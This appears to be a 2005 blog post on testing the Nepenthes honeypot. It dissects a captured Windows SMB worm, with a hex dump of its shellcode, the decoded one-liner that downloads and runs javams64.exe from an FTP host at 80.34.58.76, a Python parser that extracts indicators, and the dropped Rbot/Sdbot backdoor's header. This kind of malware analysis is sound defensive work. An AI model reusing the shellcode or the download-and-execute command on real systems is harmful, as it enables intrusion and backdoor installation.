November 11, 2005

Testing the Nepenthes malware collector

After compiling and starting the program (Nepenthes) with hardly any effort or configuration, you start receiving data from lots of worms trying to exploit the ports that have been put on listen (the most common ones being, of course, the ones that exploit Windows vulnerabilities).

Below I paste the content of one of these worms, which carries an interesting payload:

Unknown ASN1_SMB Shellcode (Buffer 4291 bytes) (State 1)
00000000 00 00 10 bf ff 53 4d 42 73 00 00 00 00 18 07 c8 |.....SMBs.......|
00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 37 13 |..............7.|
00000020 00 00 00 00 0c ff 00 00 00 04 11 0a 00 00 00 00 |................|
00000030 00 00 00 7e 10 00 00 00 00 d4 00 00 80 7e 10 60 |...~.........~.`|
00000040 82 10 7a 06 06 2b 06 01 05 05 02 a0 82 10 6e 30 |..z..+........n0|
00000050 82 10 6a a1 82 10 66 23 82 10 62 03 82 04 01 00 |..j...f#..b.....|
00000060 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
*
00000460 03 00 23 82 0c 57 03 82 04 0a 00 90 42 90 42 90 |..#..W......B.B.|
00000470 42 90 42 81 c4 54 f2 ff ff fc e8 46 00 00 00 8b |B.B..T.....F....|
00000480 45 3c 8b 7c 05 78 01 ef 8b 4f 18 8b 5f 20 01 eb |E<.|.x...O.._ ..|
00000490 e3 2e 49 8b 34 8b 01 ee 31 c0 99 ac 84 c0 74 07 |..I.4...1.....t.|
000004a0 c1 ca 0d 01 c2 eb f4 3b 54 24 04 75 e3 8b 5f 24 |.......;T$.u.._$|
000004b0 01 eb 66 8b 0c 4b 8b 5f 1c 01 eb 8b 1c 8b 01 eb |..f..K._........|
000004c0 89 5c 24 04 c3 31 c0 64 8b 40 30 85 c0 78 0f 8b |.\$..1.d.@0..x..|
000004d0 40 0c 8b 70 1c ad 8b 68 08 e9 0b 00 00 00 8b 40 |@..p...h.......@|
000004e0 34 05 7c 00 00 00 8b 68 3c 5f 31 f6 60 56 eb 0d |4.|....h<_1.`V..|
000004f0 68 ef ce e0 60 68 98 fe 8a 0e 57 ff e7 e8 ee ff |h...`h....W.....|
00000500 ff ff 65 63 68 6f 20 6f 70 65 6e 20 38 30 2e 33 |..echo open 80.3|
00000510 34 2e 35 38 2e 37 36 20 31 33 38 35 38 20 3e 20 |4.58.76 13858 > |
00000520 6f 26 65 63 68 6f 20 75 73 65 72 20 31 20 31 20 |o&echo user 1 1 |
00000530 3e 3e 20 6f 20 26 65 63 68 6f 20 67 65 74 20 6a |>> o &echo get j|
00000540 61 76 61 6d 73 36 34 2e 65 78 65 20 3e 3e 20 6f |avams64.exe >> o|
00000550 20 26 65 63 68 6f 20 71 75 69 74 20 3e 3e 20 6f | &echo quit >> o|
00000560 20 26 66 74 70 20 2d 6e 20 2d 73 3a 6f 20 26 64 | &ftp -n -s:o &d|
00000570 65 6c 20 2f 46 20 2f 51 20 6f 20 26 6a 61 76 61 |el /F /Q o &java|
00000580 6d 73 36 34 2e 65 78 65 0d 0a 00 42 42 42 42 42 |ms64.exe...BBBBB|
00000590 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 |BBBBBBBBBBBBBBBB|
...

The payload manages, in a single command line, to download a file from an FTP server and then execute it; let's take a look:

echo open 80.34.58.76 13858 > o&echo user 1 1 >> o &echo get javams64.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &javams64.exe
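
As an added example (not code from the post or from Nepenthes), this Python script rebuilds the bytes from the Nepenthes hex dump above, pulls out the clear-text one-liner and breaks it into the indicators a defender would log: FTP server and port, credentials, the file fetched, the script file that is created and deleted, and what is finally executed. The SAMPLE_DUMP text is the tail of the buffer shown above; the function names are my own.

```python
import re

# Constructed sample: the tail of the shellcode buffer as Nepenthes printed it in the post
# (offset, 16 hex bytes, ASCII column), ending just before the 'BBBB' padding.
SAMPLE_DUMP = """\
00000500 ff ff 65 63 68 6f 20 6f 70 65 6e 20 38 30 2e 33 |..echo open 80.3|
00000510 34 2e 35 38 2e 37 36 20 31 33 38 35 38 20 3e 20 |4.58.76 13858 > |
00000520 6f 26 65 63 68 6f 20 75 73 65 72 20 31 20 31 20 |o&echo user 1 1 |
00000530 3e 3e 20 6f 20 26 65 63 68 6f 20 67 65 74 20 6a |>> o &echo get j|
00000540 61 76 61 6d 73 36 34 2e 65 78 65 20 3e 3e 20 6f |avams64.exe >> o|
00000550 20 26 65 63 68 6f 20 71 75 69 74 20 3e 3e 20 6f | &echo quit >> o|
00000560 20 26 66 74 70 20 2d 6e 20 2d 73 3a 6f 20 26 64 | &ftp -n -s:o &d|
00000570 65 6c 20 2f 46 20 2f 51 20 6f 20 26 6a 61 76 61 |el /F /Q o &java|
00000580 6d 73 36 34 2e 65 78 65 0d 0a 00 42 42 42 42 42 |ms64.exe...BBBBB|
"""

def parse_hexdump(text: str) -> bytes:
    out = bytearray()  # hexdump -C style lines: offset, hex bytes, |ascii|; a bare "*" carries no bytes
    for line in text.splitlines():
        tokens = line.split("|", 1)[0].split()[1:]            # drop the offset column
        out.extend(int(t, 16) for t in tokens if len(t) == 2)
    return bytes(out)

def extract_command(data: bytes) -> str:
    m = re.search(rb"echo open[^\x00\r\n]*", data)  # the one-liner sits in clear text up to CRLF/NUL
    if m is None:
        raise ValueError("no FTP dropper command found")
    return m.group(0).decode("ascii")

def parse_ftp_dropper(cmd: str) -> dict:
    # Split the '&'-chained echo/ftp/del/run sequence into indicators a defender can act on.
    info = {"host": None, "port": 21, "user": None, "password": None, "get": [],
            "ftp_script": None, "deletes_script": False, "runs": []}
    script = None                                             # name of the script the echo lines build
    for seg in (s.strip() for s in cmd.split("&")):
        m = re.match(r"echo (.+?) >>? *(\S+)$", seg)          # 'echo <ftp line> > script'
        if m:
            words, script = m.group(1).split(), m.group(2)
            if words[0] == "open":
                info["host"], info["port"] = words[1], (int(words[2]) if len(words) > 2 else 21)
            elif words[0] == "user":
                info["user"], info["password"] = words[1], (words[2] if len(words) > 2 else None)
            elif words[0] == "get":
                info["get"].append(words[1])
        elif seg.startswith("ftp "):
            s = re.search(r"-s:(\S+)", seg)                   # -s:<file> replays the scripted session
            info["ftp_script"] = s.group(1) if s else None
        elif seg.startswith("del ") and script in seg.split():
            info["deletes_script"] = True                      # the script file is wiped afterwards
        elif seg in info["get"]:
            info["runs"].append(seg)                           # the dropped file is executed last
    return info
```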

We download the javams64.exe file:

00000000 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 |MZ..............|
00000010 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 44 |........@......D|
00000020 6f 74 46 69 78 20 5b 47 50 63 48 5d 20 20 20 20 |otFix [GPcH]    |
00000030 20 20 20 20 20 20 20 20 20 20 20 20 e8 00 00 00 |            ....|
00000040 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 |........!..L.!Th|
00000050 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f |is program canno|
00000060 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 |t be run in DOS |
00000070 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 |mode....$.......|
00000080 93 41 cc 56 d7 20 a2 05 d7 20 a2 05 d7 20 a2 05 |.A.V. ... ... ..|
*
000001e0 2e 61 73 70 61 63 6b 00 00 a0 04 00 00 10 00 00 |.aspack.........|
000001f0 00 04 00 00 00 04 00 00 00 00 00 00 00 00 00 00 |................|
00000200 00 00 00 00 40 00 00 c0 2e 73 68 69 65 6c 64 00 |....@....shield.|
00000210 00 50 01 00 00 b0 04 00 00 4a 01 00 00 04 00 00 |.P.......J......|
00000220 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 |............@...|
00000230 2e 6e 66 6f 00 00 00 00 00 10 50 00 00 00 06 00 |.nfo......P.....|
00000240 00 02 00 00 00 4e 01 00 00 00 00 00 00 00 00 00 |.....N..........|
00000250 00 00 00 00 40 00 00 c0 2e 6e 66 6f 00 00 00 00 |....@....nfo....|
*
000003d0 00 00 00 00 00 00 00 00 00 00 00 31 2e 32 35 00 |...........1.25.|
000003e0 47 50 63 48 0b 00 00 0a 00 00 00 00 00 00 00 00 |GPcH............|
000003f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 95 |................|

Running it through VirusTotal, Kaspersky detects it as [Backdoor.Win32.Rbot.gen] and Panda as [W32/Sdbot.FQF.worm].
